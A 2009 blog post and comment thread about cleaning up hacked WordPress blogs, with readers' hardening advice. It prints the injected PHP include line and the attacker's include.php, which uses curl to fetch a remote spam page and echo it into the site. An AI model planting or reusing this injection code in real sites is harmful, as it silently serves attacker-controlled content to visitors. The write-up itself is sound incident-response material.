More on the evil in the woodshed

by Suw on August 31, 2009

CnV is still having spam injection problems. Unfortunately, the upgrades to WordPress and Thesis didn’t solve the problem, and a few days later it was full of spam again. You won’t have noticed because it was hidden, but it would have made the site slow to load and has probably totally screwed my GoogleJuice. I’ve been advised to totally reinstall WordPress, but I’d rather figure out what is going on so that if it happens again I’ll be better placed to deal with it. Blogiculum Vitae has also compromised but, annoyingly, not in exactly the same way.

Cleaning up CnV
The first thing I did was to look at my footer.php, as from looking at the source of chocolateandvodka.com that’s where the spam links seem to have been injected. I found a line or two of code that shouldn’t have been there. Unfortunately I didn’t keep a copy of what they said, but part of it was a call to an “include.php”. I deleted the bad code, and then searched through all the WP php files until I found include.php. When I opened it, it was clearly calling on code hosted on a third party site, so I deleted it. Again, I wish I’d kept the code, but I didn’t think about it until just now!

Anyway, that didn’t do the trick because I got more crap injected into my header, this time. So I’ve just spent some time trawling through and I found a compromised theme. It’s an old theme that I no longer use, Cold Blue. Originally when I opened the themes folder last time, I found all themes had their permissions set so that nothing could execute, and I didn’t remember those permissions settings being like that last time… but I’m not an expert and I couldn’t remember the permissions from the last time I fiddled with WP.

Currently, they look like this:

Wordpress hackage

This is after totally replacing Thesis, and trying to delete Lane-10, another theme I don’t use. I still can’t get rid of the damn Lane-10 folder (or the Cold Blue one either, come to that). Before I changed anything, permissions were set to r-xr-xr-x (read: yes; write: no; execute: yes). (On Blogiculum Vitae, they are set to rwxr-xr-x, which I presume is the right setting.)

Anyway, I opened up Cold Blue and saw:

Wordpress hackage

Which doesn’t look too bad, until you take a look in Images:

Wordpress hackage

Ewww! Evil!

I have deleted the contents of the theme folder. The other themes look like they have not been compromised. I can’t find any other PHP files that look odd. Time will tell if I’ve cleaned it out or not.

UPDATE: Thanks to everyone who’s commented. ManxStef was correct – the hackers did create an admin account, so I have deleted every account except mine. If you were a subscriber and this has affected any way, please accept my apologies.

Sadly, I now have confirmation that my attempt to clean up has not worked – there’s a new spam injection, this time in the header. The code is:

<?php include (“include.php”); ?>

That bit of code was tucked in at the bottom of the header. Just deleting it gets rid of the spam, but there’s got to be something else still lurking in a dark corner that is re-editing my theme files to re-insert that code.

This include.php exists in wp-content/themes/thesis and contains this code:

<?php
set_time_limit(10);
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_URL, “http://777-software.com/hearme.html”);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1 );
$RemoteData = curl_exec($ch);
echo $RemoteData;
curl_close($ch);
?>

And here I officially run out of WordPress expertise and am going to have to call in the big guns.

Cleaning up Blogiculum Vitae.
Blogiculum Vitae is running WP 2.8.4 and uses the Thesis 1.1 theme.

Again, the footer.php has been compromised, but this time the spam links have been injected directly into it.

More WordPress hackage

I have sorted through the files to see if I can see where the compromise is, looking at the dates to see if any stand out, as there shouldn’t be anything new there. I haven’t been able to find anything else that looks out of place, so perhaps it’s been compromised using a different, more direct method. Time to upgrade WordPress and Thesis!

If anyone has any more information on this, I’d be most grateful if you could leave a comment. I’m not sure if I’ve solved the problem or just slowed it down a bit. And if you see any spam URLs in the source code of the page, please let me know.

UPDATE: Although the CnV compromise is ongoing, Blogiculum Vitae seems to still be clean. I am thankful for small mercies!

ManxStef August 31, 2009 at 10:08 pm

I’ve seen a few exploits like this before, though with earlier versions. (Wasn’t Magic Include Shell, was it?) The attack vector can be multiple routes: WordPress itself (though if you were already on 2.8.4 this suggests otherwise), a vulnerable theme (usually functions.php) or plugin, another web app such as a forum, etc.

If they’ve compromised things to the point of changing permissions of directories so you can no longer access them then you’ll most-likely need root on the webserver to clean this up, otherwise they may have code in these directories to re-infect whatever you upload. If not, do make sure whatever you upload isn’t world-writable, i.e. the ‘other’ permissions, and ideally remove group write from all the files you don’t need to edit, too.

It’s also possible that they’ve created entries in the database itself, so do go through that and check if you can – they may have at the very least created a new admin account to get back in.

There’s some good advice on the WordPress Codex about hardening, once you’ve secured it again:
http://codex.wordpress.org/Hardening_WordPress

and BlogSecurity.net:
http://blogsecurity.net/wordpress/wordpress-security-whitepaper

ManxStef August 31, 2009 at 10:10 pm

Oh, forgot to mention, if you’ve not signed up for the Google Webmaster Tools it’s a good way of getting a warning that your site’s been compromised:
https://www.google.com/webmasters/tools/

Make sure you add your e-mail address to the panel and it should notify you of anything untoward.

Suw August 31, 2009 at 10:35 pm

Hi ManxStef! Thank you so much for the advice and the links. I did indeed have a compromised admin account on CnV, which is now gone, along with *all* subscribers. There was no compromised admin account on Blogiculum Vitae.

Regarding the versions, the compromise of CnV was done before I upgraded it to the newest version, so after the upgrade I would imagine the continued compromises were just extensions of the first.

The permissions thing was not that I couldn’t access them, but that they didn’t have the right permissions. I’ve gone though every Wordpress folder and checked for suspicious looking stuff, but to be honest I’m not familiar enough with Wordpress to know necessarily at a glance what I’m looking for.

And finally, I have no idea how to inspect the database, so if it comes to that I’m going to have to export my content and do a fresh installation.

ManxStef August 31, 2009 at 10:47 pm

Ah, gotcha. Yeah, good idea to nuke all the users that aren’t yours, if only ’cause there were some privilege-escalation exploits previously that allowed a standard user to get admin access.

I’d be happy to take a look through the DB if you can export it? (wp-db-backup may be the easiest way, though through a MySQL tool such as Sequel Pro or a web-based app like phpMyAdmin will do it, too.) Might also be an idea to diff it all against the latest WordPress source, though if you upgraded and overwrote everything then it should be fine.

It’s somewhat reassuring that it happened to an older version of WordPress rather than the latest, as that would’ve pointed at a potential new exploit – not that this helps with your cleanup! Perms shouldn’t be too much of an issue if everything’s read-only by default (with the exception of wp-content/cache and wp-content/uploads, I’m guessing).

Oh yeah, if you can change the password of the MySQL database user (as per the Twitter mention) that’d be an idea. If it’s an automated hack it’s possible they’ve not got it, but they’ll have had access to it so it’s better to be safe.

nicholas butler September 1, 2009 at 7:43 am

Suw

I sorted this out for Mike last year. There will be a compromised theme file and very likely a compromised theme file in the wp-admin directory. The file contains a script that acts like an FTP server presenting the user with a form that allows them to send and recieve files from your site. In turn this gives them the access they are looking for.

What I did was the following.

1. Get a clean copy of my theme, note I double checked the theme looking for the string of text called uuencode, or gzip or base_decode64 because the secret rubbish string for the file was hidden in that long strong of giberrish.

2. copy down the wp-config and wp-content files

3. test wp-content directory for the above

4. login to wp-admin and remove unwanted users, remove unwanted posts and unwanted pages and remove the user admin in favour of another user account.

5. On my Webghost control panel set the path to your website to a new path and install wordpress there then copy up wp-config and wp-content

6. Add some security plugins notably, admin IP Watch, wordpress-security

If your having any trouble with any of these steps then let me know.

Nik

Matt Wardman September 1, 2009 at 10:29 am

Ouch.

I had a couple of exploits last year. I ended up starting for scratch in a new server account. That is now my standard approach. Create new account -> reinstall -> redirect domain. Painful but it does not need repeating.

Best of luck.

Matt

Matt September 7, 2009 at 5:06 pm

It is painful to clean up after a hack, it sounds like their attack vector isn’t WordPress anymore. (It could even be another user on the same server.) Sounds like you’re in good hands with Mike Little (one of the top WP people in the world) but if you run into any more roadblocks don’t be shy about dropping me a line and we’ll try to help you.

Suw September 7, 2009 at 6:14 pm

I’m pretty sure that the attack vector was Wordpress and that my upgrade to WP and Thesis and my cleaning-up attempts simply failed to remove all the malicious code. It then re-inserted it’s spam again.

Mike did an amazing job of cleaning things up. I have more details from him that I need to post, just to round up the story. But thanks for the offer of help! It’s much appreciated. The only thing that’s left to do now is to re-establish my non-spammy credentials with Google, which has dropped my blogs from its search results. 🙁

Carl Morris September 11, 2009 at 3:56 pm

Suw, this Matt Cutts post about reconsideration on Google might help.

BTW, I’m getting a PHP error in your footer.php now, it might be related to this problem or the fix.

Suw September 11, 2009 at 5:36 pm

Carl, I’ve signed up with Google’s Webmaster tools and submitted CnV for reconsideration so hopefully that will do the trick. Will replace the footer.php file on CnV. It probably just got borked in my attempted clean up.

Comments on this entry are closed.

Previous post:

Next post: